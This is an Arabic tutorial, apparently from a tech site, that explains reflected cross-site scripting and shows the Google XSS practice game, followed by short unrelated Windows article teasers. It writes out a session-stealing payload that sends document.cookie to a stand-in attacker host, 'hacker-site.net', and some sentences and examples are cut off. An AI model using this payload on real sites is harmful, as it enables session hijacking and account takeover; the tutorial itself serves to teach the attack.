ما هي البرمجة النصية عبر المواقع؟
تعد البرمجة النصية عبر المواقع (XSS) إحدى تقنيات الهجوم الأكثر شيوعًا اليوم، والمعروفة باسم عراب الهجوم، وقد تم إدراجها لسنوات عديدة على أنها أخطر تقنيات الهجوم على تطبيقات الويب.
لا تسميها اختصارًا CSS لتجنب الخلط مع مفهوم Cascading Style Sheet لـ HTML،
تعتمد
تقنية
لتنفيذ تعليمات برمجية Javascript ضارة لتولي جلسة تسجيل دخول المستخدم.
لفهم أفضل، دعونا نفكر في المثال التالي. تطبيق ويب يسمح بطباعة القيمة التي نمررها عبر عنوان URL، على افتراض أننا نمرر في متغير الاسم قيمة Ping:
كل شيء على ما يرام حتى الآن، دعونا نراجع كود مصدر HTML:
ما يسهل رؤيته هو أن قيمة الاسم التي أدخلناها قد تم إدراجها في كود المصدر. لذلك من الممكن أيضًا إدراج كل ما تم استيراده. تصبح المشكلة خطيرة إذا لم تكن القيمة المدخلة عبارة عن سلسلة عادية كما هو مذكور أعلاه، ولكنها جزء من التعليمات البرمجية التي قد تكون خطيرة، شيء من هذا القبيل:
حاول مرة أخرى باستخدام القيمة أعلاه:
ومن هذا المثال يمكننا أن نستنتج شيئين. أولاً، يمكن لمتغير الاسم تلقي أي قيمة إدخال وإرسالها إلى الخادم للمعالجة. ثانيًا، لم يتحكم الخادم في قيمة الإدخال هذه قبل إعادتها إلى المتصفح. يؤدي هذا إلى إدراج كود جافا سكريبت في الكود المصدري.
ينقسم XSS بشكل عام إلى ثلاثة أنواع رئيسية: المنعكس والمخزن والمعتمد على DOM. في هذه المقالة سأذكر بشكل أساسي تقنية Reflected XSS.
ما يصل إلى 75% من تقنيات XSS تعتمد على XSS المنعكس. يُطلق عليه اسم "انعكاس" لأنه في هذا النوع من سيناريوهات الاستغلال، يجب على المتسلل أن يرسل للضحية عنوان URL يحتوي على تعليمات برمجية ضارة (عادةً جافا سكريبت). يحتاج الضحية فقط إلى طلب عنوان URL هذا وسيتلقى المتسلل على الفور ردًا يحتوي على النتيجة المرجوة (الانعكاسية الموضحة هنا). بالإضافة إلى ذلك، فهو يُعرف أيضًا باسم XSS من الدرجة الأولى.
سيناريو التعدين في الحياة الواقعية
هناك العديد من الطرق لاستغلال خطأ XSS المنعكس، ومن أكثر الطرق المعروفة هي الاستيلاء على جلسة المستخدم، وبالتالي الوصول إلى البيانات والحصول على حقوقه على الموقع. .
التفاصيل موضحة في الخطوات التالية:
1. يقوم المستخدم بتسجيل الدخول إلى الويب ويفترض أنه تم تعيين جلسة:
Set-Cookie: sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d42. بطريقة ما، يرسل المتسلل إلى المستخدم عنوان URL:
http://example.com/name=var+i=new+Image;+i.src=”http://hacker-site.net/”%2bdocument.cookie;لنفترض أن example.com هو موقع الويب الذي يزوره الضحية، وأن hacker-site.net هو الموقع الذي أنشأه المتسلل
3. يصل الضحية إلى عنوان URL أعلاه
4. يقوم الخادم بالرد على الضحية مع البيانات الواردة في الطلب (مقتطف جافا سكريبت الخاص بالهاكر)
5. يتلقى المتصفح الضحية الاستجابة ويقوم بتنفيذ جافا سكريبت
6. جافا سكريبت الفعلي الذي أنشأه المتسلل هو كما يلي:
var i=new Image; i.src=”http://hacker-site.net/”+document.cookie;يقوم سطر الأوامر أعلاه بتقديم طلب إلى موقع المتسلل بشكل أساسي مع كون المعلمة هي ملف تعريف ارتباط المستخدم:
GET /sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d4 HTTP/1.1Host: hacker-site.net7. من موقعك، سيلتقط المتسلل محتوى الطلب أعلاه ويعتبر أن جلسة المستخدم قد تم الاستيلاء عليها. في هذه المرحلة، يمكن للمتسلل انتحال شخصية الضحية وممارسة جميع الحقوق على موقع الويب الذي يمتلكه الضحية.
يمارس
أنشأت Google صفحة للتدرب على استغلال أخطاء XSS هنا: https://xss-game.appspot.com
الهدف من هذه التحديات هو أنه يجب عليك إدخال البرامج النصية لتظهر نافذة منبثقة. التحدي الأول هو توضيح التقنية المنعكسة، ورمز الاستغلال بسيط للغاية:
https://xss-game.appspot.com/level1/frame?query=alert('pwned')حظ سعيد!
هل ترى إشعار تفعيل Windows 10 في الزاوية اليمنى من الشاشة؟ سترشدك هذه المقالة إلى كيفية حذف إشعار طلب حقوق الطبع والنشر على نظام التشغيل Windows 10.
أصدرت Microsoft مؤخرًا آخر تحديث تراكمي لمستخدمي أجهزة الكمبيوتر التي تعمل بنظام Windows 10 والذي يسمى Build 14393.222. يعمل هذا التحديث الذي تم إصداره لنظام التشغيل Windows 10 بشكل أساسي على إصلاح الأخطاء بناءً على تعليقات المستخدمين وتحسين تجربة أداء نظام التشغيل.
هل لديك أجهزة كمبيوتر على شبكتك المحلية تحتاج إلى وصول خارجي؟ يمكن أن يكون استخدام مضيف أساسي كحارس بوابة لشبكتك حلاً جيدًا.
في بعض الأحيان قد تحتاج إلى حذف سجلات الأحداث القديمة مرة واحدة. في هذا الدليل، سيعرض لك موقع Quantrimang.com 3 طرق لحذف كافة سجلات الأحداث بسرعة في Windows 10 Event Viewer.
إذا كنت تفضل استخدام لوحة مفاتيح كلاسيكية قديمة، مثل IBM Model M، والتي لا تتضمن مفتاح Windows فعليًا، فهناك طريقة سهلة لإضافة المزيد، عن طريق استعارة مفتاح لا تستخدمه كثيرًا.
WindowTop هي أداة لديها القدرة على تعتيم جميع نوافذ التطبيقات والبرامج التي تعمل على أجهزة الكمبيوتر التي تعمل بنظام Windows 10. أو يمكنك استخدام واجهة ذات خلفية داكنة على النوافذ.
لقد ذكرنا في العديد من المقالات السابقة أن البقاء مجهول الهوية عبر الإنترنت أمر في غاية الأهمية. يتم تسريب المعلومات الخاصة كل عام، مما يجعل الأمان عبر الإنترنت ضروريًا بشكل متزايد. وهذا أيضًا هو السبب وراء ضرورة استخدام عناوين IP الافتراضية. فيما يلي، سنتعرف على طرق إنشاء عناوين IP وهمية!
شريط اللغة في نظام التشغيل Windows 8 عبارة عن شريط أدوات لغة مصغر مصمم للعرض تلقائيًا على شاشة سطح المكتب. ومع ذلك، يرغب العديد من الأشخاص في إخفاء شريط اللغة هذا على شريط المهام.
يعد تعظيم سرعة الإنترنت أمرًا ضروريًا لتحسين اتصال الشبكة لديك. يمكنك الحصول على تجربة ترفيه وعمل مثالية باستخدام أجهزة الكمبيوتر وأجهزة التلفزيون المجهزة للإنترنت ووحدات التحكم في الألعاب وما إلى ذلك.
يعد الاتصال اللاسلكي أمرًا ضروريًا اليوم، ولهذا السبب، يعد الأمان اللاسلكي ضروريًا لضمان السلامة في شبكتك الداخلية.
